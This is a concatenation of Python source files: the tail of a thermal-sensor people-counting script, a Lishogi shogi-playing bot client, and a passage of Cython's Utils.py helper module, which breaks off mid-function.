        '--blob_min_convexity', help='blod detection filter by convexity min convexity', type=float)
    parser.add_argument(
        '--blob_filterbyinertia', help='blod detection filter by inertia', action='store_true')
    parser.add_argument(
        '--blob_min_inertiaratio', help='blod detection filter by inertia inertia ratio', type=float)
    parser.add_argument(
        '--csv_save_interval', help='csv file saving interval in seconds', type=int)
    args = parser.parse_args()
    print(args)
    COLOR_DEPTH = args.color_depth
    MAX_TEMP = args.max_temp
    AMBIENT_OFFSET = args.ambient_offset
    AMBIENT_TIME = args.ambient_time
    BLOB_MIN_THRESHOLD = args.blob_min_threshold
    BLOB_MAX_THRESHOLD = args.blob_max_threshold
    BLOB_FILTERBYAREA = args.blob_filterbyarea
    BLOB_MIN_AREA = args.blob_min_area
    BLOB_FILTERBYCIRCULARITY = args.blob_filterbycircularity
    BLOB_MIN_CIRCULARITY = args.blob_min_circularity
    BLOB_FILTERBYCONVEXITY = args.blob_filterbyconvexity
    BLOB_MIN_CONVEXITY = args.blob_min_convexity
    BLOB_FILTERBYINERTIA = args.blob_filterbyinertia
    BLOB_MIN_INERTIARATIO = args.blob_min_inertiaratio
    CSV_SAVE_INTERVAL = args.csv_save_interval
    # create data folders if they don't exist
    if not os.path.exists(get_filepath('../data')):
        os.makedirs(get_filepath('../data'))
    i2c_bus = busio.I2C(board.SCL, board.SDA)
    # For headless pygame
    if args.headless:
        print("App understands we are running headless.")
        os.environ['SDL_VIDEODRIVER'] = 'dummy'
        os.putenv('SDL_VIDEODRIVER', 'dummy')
    else:
        os.putenv('SDL_FBDEV', '/dev/fb1')
    pygame.init()
    # initialize the sensor
    sensor = adafruit_amg88xx.AMG88XX(i2c_bus)
    # (row, col) coordinates of the sensor's 8x8 grid, used as the
    # interpolation source points.
    points = [(math.floor(ix / 8), (ix % 8)) for ix in range(0, 64)]
    grid_x, grid_y = np.mgrid[0:7:32j, 0:7:32j]
    # sensor is an 8x8 grid so lets do a square
    height = 240
    width = 240
    # height = 480
    # width = 480
    # the list of colors we can choose from
    black = Color("black")
    colors = list(black.range_to(Color("white"), COLOR_DEPTH))
    # create the array of colors
    colors = [(int(c.red * 255), int(c.green * 255), int(c.blue * 255))
              for c in colors]
    displayPixelWidth = width / 30
    displayPixelHeight = height / 30
    lcd = pygame.display.set_mode((width, height))
    lcd.fill((255, 0, 0))
    pygame.display.update()
    pygame.mouse.set_visible(False)
    lcd.fill((0, 0, 0))
    pygame.display.update()
    # Setup SimpleBlobDetector parameters.
    params = cv2.SimpleBlobDetector_Params()
    # Change thresholds
    if BLOB_MIN_THRESHOLD:
        params.minThreshold = BLOB_MIN_THRESHOLD
    if BLOB_MAX_THRESHOLD:
        params.maxThreshold = BLOB_MAX_THRESHOLD
    # Filter by Area.
    if BLOB_FILTERBYAREA:
        params.filterByArea = BLOB_FILTERBYAREA
        params.minArea = BLOB_MIN_AREA
    # Filter by Circularity
    if BLOB_FILTERBYCIRCULARITY:
        params.filterByCircularity = BLOB_FILTERBYCIRCULARITY
        params.minCircularity = BLOB_MIN_CIRCULARITY
    # Filter by Convexity
    if BLOB_FILTERBYCONVEXITY:
        params.filterByConvexity = BLOB_FILTERBYCONVEXITY
        params.minConvexity = BLOB_MIN_CONVEXITY
    # Filter by Inertia
    if BLOB_FILTERBYINERTIA:
        params.filterByInertia = BLOB_FILTERBYINERTIA
        params.minInertiaRatio = BLOB_MIN_INERTIARATIO
    # Set up the detector with default parameters.
    detector = cv2.SimpleBlobDetector_create(params)
    # initialize centroid tracker
    ct = CentroidTracker()
    # a dictionary to map each unique object ID to a TrackableObject
    trackableObjects = {}
    # the total number of objects that have moved either up or down
    total_down = 0
    total_up = 0
    total_down_old = 0
    total_up_old = 0
    # let the sensor initialize
    time.sleep(.1)
    # press key to exit
    screencap = True
    # array to hold mode of last 10 minutes of temperatures
    mode_list = []
    # thread for saving data
    save_thread = threading.Thread(
        target=csv_save, args=(CSV_SAVE_INTERVAL,))
    save_thread.start()
    print('sensor started!')
    while(screencap):
        start = time.time()
        # read the pixels
        pixels = []
        for row in sensor.pixels:
            pixels = pixels + row
        #print(ct)
        # payload = [str(datetime.now().isoformat()),
        #            ct.get_count(), total_up, total_down]
        payload = [str(datetime.now().isoformat()),
                   timestart, total_up, total_down]
        mode_result = stats.mode([round(p) for p in pixels])
        mode_list.append(int(mode_result[0]))
        # instead of taking the ambient temperature over one frame of data take it over a set amount of time
        MAX_TEMP = float(np.mean(mode_list)) + AMBIENT_OFFSET
        # rescale raw temperatures into color-palette indices
        pixels = [map_value(p, np.mean(mode_list) + 1, MAX_TEMP, 0,
                            COLOR_DEPTH - 1) for p in pixels]
        # perform interpolation
        bicubic = griddata(points, pixels, (grid_x, grid_y), method='cubic')
        # draw everything
        for ix, row in enumerate(bicubic):
            for jx, pixel in enumerate(row):
                try:
                    pygame.draw.rect(lcd, colors[constrain(int(pixel), 0, COLOR_DEPTH - 1)],
                                     (displayPixelHeight * ix, displayPixelWidth * jx, displayPixelHeight, displayPixelWidth))
                except:
                    # NOTE(review): bare except deliberately keeps the frame
                    # loop alive on draw/NaN errors -- confirm intent.
                    print("Caught drawing error")
        surface = pygame.display.get_surface()
        myfont = pygame.font.SysFont("comicsansms", 25)
        img = pygame.surfarray.array3d(surface)
        img = np.swapaxes(img, 0, 1)
        # Read image
        img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        img_not = cv2.bitwise_not(img)
        # Detect blobs.
        keypoints = detector.detect(img_not)
        img_with_keypoints = cv2.drawKeypoints(img, keypoints, np.array(
            []), (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
        # draw a horizontal line in the center of the frame -- once an
        # object crosses this line we will determine whether they were
        # moving 'up' or 'down'
        pygame.draw.line(lcd, (255, 255, 255),
                         (0, height // 2), (width, height // 2), 2)
        pygame.display.update()
        for i in range(0, len(keypoints)):
            x = keypoints[i].pt[0]
            y = keypoints[i].pt[1]
            # print circle around blob
            pygame.draw.circle(lcd, (200, 0, 0), (int(
                x), int(y)), round(keypoints[i].size), 2)
        # update our centroid tracker using the detected centroids
        objects = ct.update(keypoints)
        # loop over the tracked objects
        for (objectID, centroid) in objects.items():
            # check to see if a trackable object exists for the current
            # object ID
            to = trackableObjects.get(objectID, None)
            # if there is no existing trackable object, create one
            if to is None:
                to = TrackableObject(objectID, centroid)
            # otherwise, there is a trackable object so we can utilize it
            # to determine direction
            else:
                # the difference between the y-coordinate of the *current*
                # centroid and the mean of *previous* centroids will tell
                # us in which direction the object is moving (negative for
                # 'up' and positive for 'down')
                y = [c[1] for c in to.centroids]
                direction = centroid[1] - np.mean(y)
                to.centroids.append(centroid)
                # check to see if the object has been counted or not
                if not to.counted:
                    # if the direction is negative (indicating the object
                    # is moving up) AND the centroid is above the center
                    # line, count the object
                    # the historical centroid must present in the lower half of the screen
                    if direction < 0 and centroid[1] < height // 2 and count_within_range(y, height//2, height) > 0:
                        total_up += 1
                        to.counted = True
                    # if the direction is positive (indicating the object
                    # is moving down) AND the centroid is below the
                    # center line, count the object
                    # the historical centroid must present in the upper half of the screen
                    elif direction > 0 and centroid[1] > height // 2 and count_within_range(y, 0, height//2) > 0:
                        total_down += 1
                        to.counted = True
            # store the trackable object in our dictionary
            trackableObjects[objectID] = to
        # update counter in top left
        textsurface1 = myfont.render(
            "IN: "+str(total_up), False, (255, 255, 255))
        textsurface2 = myfont.render(
            'OUT: '+str(total_down), False, (255, 255, 255))
        lcd.blit(textsurface1, (0, 0))
        lcd.blit(textsurface2, (0, 25))
        total_up_old = total_up
        total_down_old = total_down
        pygame.display.update()
        for event in pygame.event.get():
            if event.type == pygame.KEYDOWN:
                print('terminating...')
                screencap = False
                break
        # for running the save on for a certain amount of time
        # if time.time() - start_time >= 10:
        #     print('terminating...')
        #     screencap = False
        # empty mode_list every AMBIENT_TIME seconds
        if len(mode_list) > AMBIENT_TIME:
            mode_list = []
        # throttle to ~25 frames per second
        time.sleep(max(1./25 - (time.time() - start), 0))
    # Release everything if job is finished
    cv2.destroyAllWindows()
# Script entry point.
if __name__ == "__main__":
    main()
|
lishogi-bot.py | import argparse
import shogi
import engine_wrapper
import model
import json
import lishogi
import logging
import multiprocessing
import traceback
import logging_pool
import signal
import sys
import time
import backoff
import threading
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
from requests.exceptions import ChunkedEncodingError, ConnectionError, HTTPError, ReadTimeout
from urllib3.exceptions import ProtocolError
from ColorLogger import enable_color_logging
from util import *
import copy
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "0.7.0"

# Global flag flipped by the SIGINT handler; polled by the worker loops to
# shut down gracefully.
terminated = False
def signal_handler(signum, frame):
    """SIGINT handler: request a graceful shutdown of all worker loops.

    Fixes the "Recieved" typo in the log message and renames the first
    parameter (it shadowed the ``signal`` module; the interpreter calls
    handlers positionally).

    Args:
        signum: received signal number (unused).
        frame: current stack frame (unused).
    """
    global terminated
    logger.debug("Received SIGINT. Terminating client.")
    terminated = True


signal.signal(signal.SIGINT, signal_handler)
def is_final(exception):
    """Return True when retrying is pointless: an HTTP error below 500.

    Used as the ``giveup`` predicate for backoff-wrapped API calls --
    client-side (4xx) errors will not resolve themselves on retry.
    """
    if not isinstance(exception, HTTPError):
        return False
    return exception.response.status_code < 500
def upgrade_account(li):
    """Upgrade the lishogi account to a bot account.

    Fixes the "Succesfully" typo in the success log message.

    Args:
        li: lishogi API client.
    Returns:
        True when the upgrade call succeeded, False otherwise.
    """
    if li.upgrade_to_bot_account() is None:
        return False
    logger.info("Successfully upgraded to Bot Account!")
    return True
def watch_control_stream(control_queue, li):
    """Forward lishogi event-stream messages into *control_queue* until terminated.

    Blank keep-alive lines from the stream are translated into
    ``{"type": "ping"}`` events so consumers can still make progress while
    the stream is idle.

    Args:
        control_queue: multiprocessing queue receiving decoded events.
        li: lishogi API client providing ``get_event_stream()``.
    """
    while not terminated:
        try:
            response = li.get_event_stream()
            lines = response.iter_lines()
            for line in lines:
                if line:
                    event = json.loads(line.decode('utf-8'))
                    control_queue.put_nowait(event)
                else:
                    control_queue.put_nowait({"type": "ping"})
        except Exception:
            # Best-effort reconnect loop: keep retrying on stream errors,
            # but log them and let KeyboardInterrupt/SystemExit propagate
            # (the original bare ``except: pass`` swallowed those too).
            logger.exception("Event stream disconnected; reconnecting.")
def start(li, user_profile, engine_factory, config):
    """Main event loop: accept challenges and farm games out to a pool.

    Consumes events produced by watch_control_stream() and keeps at most
    ``challenge.concurrency`` games running concurrently.
    """
    challenge_config = config["challenge"]
    max_games = challenge_config.get("concurrency", 1)
    logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
    manager = multiprocessing.Manager()
    challenge_queue = manager.list()
    control_queue = manager.Queue()
    control_stream = multiprocessing.Process(target=watch_control_stream, args=[control_queue, li])
    control_stream.start()
    # Bookkeeping: games queued for acceptance vs. games actually running.
    busy_processes = 0
    queued_processes = 0
    # +1 worker so game slots are never starved by pool bookkeeping.
    with logging_pool.LoggingPool(max_games+1) as pool:
        while not terminated:
            event = control_queue.get()
            if event["type"] == "terminated":
                break
            elif event["type"] == "local_game_done":
                busy_processes -= 1
                logger.info("+++ Process Free. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
            elif event["type"] == "challenge":
                chlng = model.Challenge(event["challenge"])
                if chlng.is_supported(challenge_config):
                    challenge_queue.append(chlng)
                    if (challenge_config.get("sort_by", "best") == "best"):
                        # Re-sort so the highest-scoring challenge is accepted first.
                        list_c = list(challenge_queue)
                        list_c.sort(key=lambda c: -c.score())
                        challenge_queue = list_c
                else:
                    try:
                        li.decline_challenge(chlng.id)
                        logger.info("    Decline {}".format(chlng))
                    except:
                        pass
            elif event["type"] == "gameStart":
                if queued_processes <= 0:
                    logger.debug("Something went wrong. Game is starting and we don't have a queued process")
                else:
                    queued_processes -= 1
                busy_processes += 1
                logger.info("--- Process Used. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
                game_id = event["game"]["id"]
                pool.apply_async(play_game, [li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue])
            while ((queued_processes + busy_processes) < max_games and challenge_queue):  # keep processing the queue until empty or max_games is reached
                chlng = challenge_queue.pop(0)
                try:
                    logger.info("    Accept {}".format(chlng))
                    queued_processes += 1
                    response = li.accept_challenge(chlng.id)
                    logger.info("--- Process Queue. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
                except (HTTPError, ReadTimeout) as exception:
                    if isinstance(exception, HTTPError) and exception.response.status_code == 404:  # ignore missing challenge
                        logger.info("    Skip missing {}".format(chlng))
                    queued_processes -= 1
            control_queue.task_done()
    logger.info("Terminated")
    control_stream.terminate()
    control_stream.join()
# Shared store for results produced by ponder threads, keyed by game id.
ponder_results = {}


@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue):
    """Play one game to completion on a pool worker.

    Streams game state updates from lishogi, drives the engine (with
    optional USI pondering on a helper thread), and posts a
    ``local_game_done`` event when finished.  Retried with exponential
    backoff unless is_final() says the HTTP error is permanent.
    """
    response = li.get_game_stream(game_id)
    lines = response.iter_lines()
    # Initial response of stream will be the full game info. Store it
    initial_state = json.loads(next(lines).decode('utf-8'))
    game = model.Game(initial_state, user_profile["username"], li.baseUrl, config.get("abort_time", 20))
    board = setup_board(game)
    engine = engine_factory(board)
    engine.get_opponent_info(game)
    conversation = Conversation(game, engine, li, __version__, challenge_queue)
    logger.info("+++ {}".format(game))
    engine_cfg = config["engine"]
    is_usi = engine_cfg["protocol"] == "usi"
    is_usi_ponder = is_usi and engine_cfg.get("ponder", False)
    # Milliseconds subtracted from our clock to cover network/engine latency.
    move_overhead = config.get("move_overhead", 1000)
    polyglot_cfg = engine_cfg.get("polyglot", {})
    book_cfg = polyglot_cfg.get("book", {})
    ponder_thread = None
    deferredFirstMove = False
    ponder_usi = None

    def ponder_thread_func(game, engine, board, wtime, btime, winc, binc):
        # Runs on a background thread: search the predicted position and
        # publish the result for the next move to pick up.
        global ponder_results
        best_move , ponder_move = engine.search_with_ponder(board, wtime, btime, winc, binc, True)
        ponder_results[game.id] = ( best_move , ponder_move )

    engine.set_time_control(game)
    if len(board.move_stack) < 2:
        # Fresh game: try to get the first move out quickly (30s server limit).
        while not terminated:
            try:
                if not play_first_move(game, engine, board, li):
                    deferredFirstMove = True
                break
            except (HTTPError) as exception:
                if exception.response.status_code == 400:  # fallthrough
                    break
    else:
        # Rejoining an in-progress game: move immediately if it is our turn.
        moves = game.state["moves"].split()
        if not is_game_over(game) and is_engine_move(game, moves):
            best_move = None
            ponder_move = None
            wtime = game.state["wtime"]
            btime = game.state["btime"]
            if board.turn == shogi.BLACK:
                wtime = max(0, wtime - move_overhead)
            else:
                btime = max(0, btime - move_overhead)
            logger.info("Searching for wtime {} btime {}".format(wtime, btime))
            best_move , ponder_move = engine.search_with_ponder(board, wtime, btime, game.state["winc"], game.state["binc"])
            engine.print_stats()
            if is_usi_ponder and not ( ponder_move is None ):
                # Ponder on the position after our move + predicted reply.
                ponder_board = copy.deepcopy(board)
                ponder_board.push(shogi.Move.from_usi(best_move))
                ponder_board.push(shogi.Move.from_usi(ponder_move))
                ponder_usi = ponder_move
                logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
                ponder_thread = threading.Thread(target = ponder_thread_func, args = (game, engine, ponder_board, wtime, btime, game.state["winc"], game.state["binc"]))
                ponder_thread.start()
            li.make_move(game.id, best_move)
    # Main per-game loop: consume stream updates until the game ends.
    while not terminated:
        try:
            binary_chunk = next(lines)
        except(StopIteration):
            break
        try:
            # Empty keep-alive chunks are treated as pings.
            upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None
            u_type = upd["type"] if upd else "ping"
            if u_type == "chatLine":
                conversation.react(ChatLine(upd), game)
            elif u_type == "gameState":
                game.state = upd
                moves = upd["moves"].split()
                if len(moves) > 0 and len(moves) != len(board.move_stack):
                    board = update_board(board, moves[-1])
                if not is_game_over(game) and is_engine_move(game, moves):
                    if config.get("fake_think_time") and len(moves) > 9:
                        # Simulate human-like thinking time in casual games.
                        delay = min(game.clock_initial, game.my_remaining_seconds()) * 0.015
                        accel = 1 - max(0, min(100, len(moves) - 20)) / 150
                        sleep = min(5, delay * accel)
                        time.sleep(sleep)
                    best_move = None
                    ponder_move = None
                    wtime = upd["wtime"]
                    btime = upd["btime"]
                    if board.turn == shogi.BLACK:
                        wtime = max(0, wtime - move_overhead)
                    else:
                        btime = max(0, btime - move_overhead)
                    if not deferredFirstMove:
                        if best_move == None:
                            logger.info("Searching for wtime {} btime {}".format(wtime, btime))
                            best_move , ponder_move = engine.search_with_ponder(board, wtime, btime, upd["winc"], upd["binc"])
                            engine.print_stats()
                        if is_usi_ponder and not ( ponder_move is None ):
                            ponder_board = copy.deepcopy(board)
                            ponder_board.push(shogi.Move.from_usi(best_move))
                            ponder_board.push(shogi.Move.from_usi(ponder_move))
                            ponder_usi = ponder_move
                            logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
                            ponder_thread = threading.Thread(target = ponder_thread_func, args = (game, engine, ponder_board, wtime, btime, upd["winc"], upd["binc"]))
                            ponder_thread.start()
                        li.make_move(game.id, best_move)
                    else:
                        # First move was deferred earlier; play it now.
                        play_first_move(game, engine, board, li)
                        deferredFirstMove = False
                # Refresh the abort/terminate deadline based on the mover's clock.
                if board.turn == shogi.BLACK:
                    game.ping(config.get("abort_time", 20), (upd["wtime"] + upd["winc"]) / 1000 + 60)
                else:
                    game.ping(config.get("abort_time", 20), (upd["btime"] + upd["binc"]) / 1000 + 60)
            elif u_type == "ping":
                if game.should_abort_now():
                    logger.info("    Aborting {} by lack of activity".format(game.url()))
                    li.abort(game.id)
                    break
                elif game.should_terminate_now():
                    logger.info("    Terminating {} by lack of activity".format(game.url()))
                    if game.is_abortable():
                        li.abort(game.id)
                    break
        except (HTTPError, ReadTimeout, RemoteDisconnected, ChunkedEncodingError, ConnectionError, ProtocolError) as e:
            # Transient network failure: keep looping only if the server
            # still lists this game as ongoing.
            if game.id in (ongoing_game["gameId"] for ongoing_game in li.get_ongoing_games()):
                continue
            else:
                break
    logger.info("--- {} Game over".format(game.url()))
    engine.stop()
    if not ( ponder_thread is None ):
        ponder_thread.join()
        ponder_thread = None
    # This can raise queue.NoFull, but that should only happen if we're not processing
    # events fast enough and in this case I believe the exception should be raised
    control_queue.put_nowait({"type": "local_game_done"})
def play_first_move(game, engine, board, li):
    """Search briefly and submit the first move if it is our turn.

    Returns True when a move was sent, False when we must wait for the
    opponent first.  The movetime is hardcoded because Lishogi enforces a
    30 second limit on the first move.
    """
    played_moves = game.state["moves"].split()
    if not is_engine_move(game, played_moves):
        return False
    first_move = engine.first_search(board, 1000)
    engine.print_stats()
    li.make_move(game.id, first_move)
    return True
def play_first_book_move(game, engine, board, li, config):
    # Stub: opening-book support is not implemented for this bot yet.
    pass
def get_book_move(board, config):
    # Stub: polyglot-style book lookup is not implemented yet.
    pass
def setup_board(game):
    """Rebuild a python-shogi board from the game's initial position plus
    all moves played so far."""
    if game.variant_name == "From Position":
        # Lishogi sends a FEN; convert it to SFEN for python-shogi.
        board = shogi.Board(makesfenfromfen(game.initial_fen))
    else:
        board = shogi.Board()  # Standard
    moves = game.state["moves"].split()
    for move in moves:
        board = update_board(board, move)
    return board
def is_white_to_move(game, moves):
    """Return True when white (the side that started) is on move, judged
    purely by the parity of the move list."""
    expected_parity = 0 if game.white_starts else 1
    return len(moves) % 2 == expected_parity
def is_engine_move(game, moves):
    """The engine moves exactly when it plays the colour currently on move."""
    return is_white_to_move(game, moves) == game.is_white
def is_game_over(game):
    """A game is over once lishogi reports any status other than 'started'."""
    status = game.state["status"]
    return status != "started"
def update_board(board, move):
    """Apply one server move (converted via makeusi()) to *board*.

    Illegal moves are logged and skipped rather than raised, so a bad
    server update cannot crash the game loop.
    """
    usi_move = shogi.Move.from_usi(makeusi(move))
    if board.is_legal(usi_move):
        board.push(usi_move)
    else:
        logger.debug('Ignoring illegal move {} on board {}'.format(makeusi(move), board.sfen()))
    return board
def intro():
    """Return the ASCII-art startup banner (with version) for the log."""
    # NOTE(review): the banner's internal spacing was mangled in transit;
    # confirm against the original art before shipping.
    return r"""
.   _/\_
.  //o o\\
.  ||   ||  lishogi-bot %s
.  ||   ||
.  ||____||  Play on Lishogi with a bot
""" % __version__
if __name__ == "__main__":
    # Command-line entry point: parse flags, configure logging, then either
    # upgrade the account to a bot or start the main challenge loop.
    parser = argparse.ArgumentParser(description='Play on Lishogi with a bot')
    parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.')
    parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.')
    parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)')
    parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None)
    args = parser.parse_args()
    logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile,
                        format="%(asctime)-15s: %(message)s")
    enable_color_logging(debug_lvl=logging.DEBUG if args.v else logging.INFO)
    logger.info(intro())
    CONFIG = load_config(args.config or "./config.yml")
    li = lishogi.Lishogi(CONFIG["token"], CONFIG["url"], __version__)
    user_profile = li.get_profile()
    username = user_profile["username"]
    is_bot = user_profile.get("title") == "BOT"
    logger.info("Welcome {}!".format(username))
    # -u flag: one-shot account upgrade before entering the loop.
    if args.u is True and is_bot is False:
        is_bot = upgrade_account(li)
    if is_bot:
        engine_factory = partial(engine_wrapper.create_engine, CONFIG)
        start(li, user_profile, engine_factory, CONFIG)
    else:
        logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
|
Utils.py | #
# Cython -- Things that don't belong
# anywhere else in particular
#
import os
import sys
import re
import io
import codecs
from contextlib import contextmanager
# Alias used below (e.g. file_newer_than) for a file's mtime lookup.
modification_time = os.path.getmtime
def cached_function(f):
    """Memoize *f* on its positional-argument tuple (unbounded cache)."""
    memo = {}

    def wrapper(*args):
        try:
            return memo[args]
        except KeyError:
            result = memo[args] = f(*args)
            return result
    return wrapper
def cached_method(f):
    """Memoize a method per instance, keyed on its positional arguments.

    The cache dict is stored on the instance under '__<name>_cache'.
    """
    attr_name = '__%s_cache' % f.__name__

    def wrapper(self, *args):
        memo = getattr(self, attr_name, None)
        if memo is None:
            memo = {}
            setattr(self, attr_name, memo)
        try:
            return memo[args]
        except KeyError:
            result = memo[args] = f(self, *args)
            return result
    return wrapper
def replace_suffix(path, newsuf):
    """Return *path* with its extension replaced by *newsuf*
    (which should include the leading dot)."""
    return os.path.splitext(path)[0] + newsuf
def open_new_file(path):
    """Open *path* for writing as a brand-new ISO-8859-1 text file."""
    if os.path.exists(path):
        # Make sure to create a new file here so we can
        # safely hard link the output files.
        os.unlink(path)
    # we use the ISO-8859-1 encoding here because we only write pure
    # ASCII strings or (e.g. for file names) byte encoded strings as
    # Unicode, so we need a direct mapping from the first 256 Unicode
    # characters to a byte sequence, which ISO-8859-1 provides
    # note: can't use io.open() in Py2 as we may be writing str objects
    return codecs.open(path, "w", encoding="ISO-8859-1")
def castrate_file(path, st):
    # Remove junk contents from an output file after a
    # failed compilation.
    # Also sets access and modification times back to
    # those specified by st (a stat struct).
    try:
        f = open_new_file(path)
    except EnvironmentError:
        # Cannot recreate the file (permissions, missing dir): give up quietly.
        pass
    else:
        f.write(
            "#error Do not use this file, it is the result of a failed Cython compilation.\n")
        f.close()
        if st:
            # mtime-1 keeps the output older than its source, forcing a rebuild.
            os.utime(path, (st.st_atime, st.st_mtime-1))
def file_newer_than(path, time):
    """True when *path*'s mtime is strictly later than *time* (epoch seconds)."""
    return os.path.getmtime(path) > time
@cached_function
def search_include_directories(dirs, qualified_name, suffix, pos,
                               include=False, sys_path=False):
    # Search the list of include directories for the given
    # file name. If a source file position is given, first
    # searches the directory containing that file. Returns
    # None if not found, but does not report an error.
    # The 'include' option will disable package dereferencing.
    # If 'sys_path' is True, also search sys.path.
    if sys_path:
        dirs = dirs + tuple(sys.path)
    if pos:
        # pos is a (source-descriptor, line, col) tuple; use its directory
        # (or root package directory) as the highest-priority search path.
        file_desc = pos[0]
        from Cython.Compiler.Scanning import FileSourceDescriptor
        if not isinstance(file_desc, FileSourceDescriptor):
            raise RuntimeError("Only file sources for code supported")
        if include:
            dirs = (os.path.dirname(file_desc.filename),) + dirs
        else:
            dirs = (find_root_package_dir(file_desc.filename),) + dirs
    dotted_filename = qualified_name
    if suffix:
        dotted_filename += suffix
    if not include:
        # Prepare package-style lookups: a.b.c -> a/b/c.suffix or
        # a/b/c/__init__.suffix.
        names = qualified_name.split('.')
        package_names = tuple(names[:-1])
        module_name = names[-1]
        module_filename = module_name + suffix
        package_filename = "__init__" + suffix
    for dir in dirs:
        # First try the flat dotted file name directly in this directory.
        path = os.path.join(dir, dotted_filename)
        if path_exists(path):
            return path
        if not include:
            package_dir = check_package_dir(dir, package_names)
            if package_dir is not None:
                path = os.path.join(package_dir, module_filename)
                if path_exists(path):
                    return path
                # NOTE(review): package_dir is already an absolute join of
                # dir + packages, so joining dir again looks redundant --
                # os.path.join discards 'dir' when package_dir is absolute.
                path = os.path.join(dir, package_dir, module_name,
                                    package_filename)
                if path_exists(path):
                    return path
    return None
@cached_function
def find_root_package_dir(file_path):
    """Walk up from *file_path* to the topmost directory that is still a
    package (contains an __init__ file)."""
    dir = os.path.dirname(file_path)
    if file_path == dir:
        # Reached the filesystem root (dirname of the root is itself).
        return dir
    elif is_package_dir(dir):
        return find_root_package_dir(dir)
    else:
        return dir
@cached_function
def check_package_dir(dir, package_names):
    """Descend *package_names* under *dir*, returning the deepest package
    directory, or None as soon as one level is not a package."""
    for dirname in package_names:
        dir = os.path.join(dir, dirname)
        if not is_package_dir(dir):
            return None
    return dir
@cached_function
def is_package_dir(dir_path):
    """Return 1 if *dir_path* holds any __init__ file (py/pyc/pyx/pxd);
    falls through to an implicit None otherwise."""
    for filename in ("__init__.py",
                     "__init__.pyc",
                     "__init__.pyx",
                     "__init__.pxd"):
        path = os.path.join(dir_path, filename)
        if path_exists(path):
            return 1
@cached_function
def path_exists(path):
    """Like os.path.exists(), but also finds files packed inside the
    zip archive this module may have been loaded from."""
    # try on the filesystem first
    if os.path.exists(path):
        return True
    # figure out if a PEP 302 loader is around
    try:
        loader = __loader__
        # XXX the code below assumes a 'zipimport.zipimporter' instance
        # XXX should be easy to generalize, but too lazy right now to write it
        archive_path = getattr(loader, 'archive', None)
        if archive_path:
            normpath = os.path.normpath(path)
            if normpath.startswith(archive_path):
                # Path is inside the archive: probe it via the loader.
                arcname = normpath[len(archive_path)+1:]
                try:
                    loader.get_data(arcname)
                    return True
                except IOError:
                    return False
    except NameError:
        # __loader__ is not defined when running from plain files.
        pass
    return False
# file name encodings

def decode_filename(filename):
    """Best-effort decode of a byte-string file name to text.

    NOTE(review): uses the Py2-only name ``unicode``; on Python 3 this
    raises NameError for any input -- confirm which interpreters must be
    supported before changing it.
    """
    if isinstance(filename, unicode):
        return filename
    try:
        filename_encoding = sys.getfilesystemencoding()
        if filename_encoding is None:
            filename_encoding = sys.getdefaultencoding()
        filename = filename.decode(filename_encoding)
    except UnicodeDecodeError:
        # Keep the original bytes when they cannot be decoded.
        pass
    return filename
# support for source file encoding detection
_match_file_encoding = re.compile(u"coding[:=]\s*([-\w.]+)").search
def detect_file_encoding(source_filename):
    """Open *source_filename* and return its declared source encoding
    (PEP 263), defaulting to UTF-8."""
    f = open_source_file(source_filename, encoding="UTF-8", error_handling='ignore')
    try:
        return detect_opened_file_encoding(f)
    finally:
        f.close()
def detect_opened_file_encoding(f):
    """Return the coding declaration found in the first two lines of the
    already-opened file *f*, or "UTF-8" if none is present."""
    # PEPs 263 and 3120
    # Most of the time the first two lines fall in the first 250 chars,
    # and this bulk read/split is much faster.
    lines = f.read(250).split(u"\n")
    if len(lines) > 1:
        m = _match_file_encoding(lines[0])
        if m:
            return m.group(1)
        elif len(lines) > 2:
            # First line had no declaration but we saw a complete second
            # line; it is the only other place PEP 263 allows one.
            m = _match_file_encoding(lines[1])
            if m:
                return m.group(1)
            else:
                return "UTF-8"
    # Fallback to one-char-at-a-time detection.
    f.seek(0)
    chars = []
    for i in range(2):
        c = f.read(1)
        while c and c != u'\n':
            chars.append(c)
            c = f.read(1)
    encoding = _match_file_encoding(u''.join(chars))
    if encoding:
        return encoding.group(1)
    return "UTF-8"
def skip_bom(f):
    """
    Read past a BOM at the beginning of a source file.
    This could be added to the scanner, but it's *substantially* easier
    to keep it at this level.
    """
    first_char = f.read(1)
    if first_char != u'\uFEFF':
        # No BOM: rewind so the caller sees the file from the start.
        f.seek(0)
def open_source_file(source_filename, mode="r",
                     encoding=None, error_handling=None,
                     require_normalised_newlines=True):
    """Open a source file with its declared encoding, past any BOM.

    With encoding=None the file is probed (PEP 263) and reopened with the
    detected encoding; files missing on disk are looked up through the
    PEP 302 zip loader when available.
    """
    if encoding is None:
        # Most of the time the coding is unspecified, so be optimistic that
        # it's UTF-8.
        f = open_source_file(source_filename, encoding="UTF-8", mode=mode, error_handling='ignore')
        encoding = detect_opened_file_encoding(f)
        if (encoding == "UTF-8"
                and error_handling == 'ignore'
                and require_normalised_newlines):
            # The optimistic handle is already correct; reuse it.
            f.seek(0)
            skip_bom(f)
            return f
        else:
            f.close()
    if not os.path.exists(source_filename):
        try:
            # Fall back to the zip archive this module was imported from.
            loader = __loader__
            if source_filename.startswith(loader.archive):
                return open_source_from_loader(
                    loader, source_filename,
                    encoding, error_handling,
                    require_normalised_newlines)
        except (NameError, AttributeError):
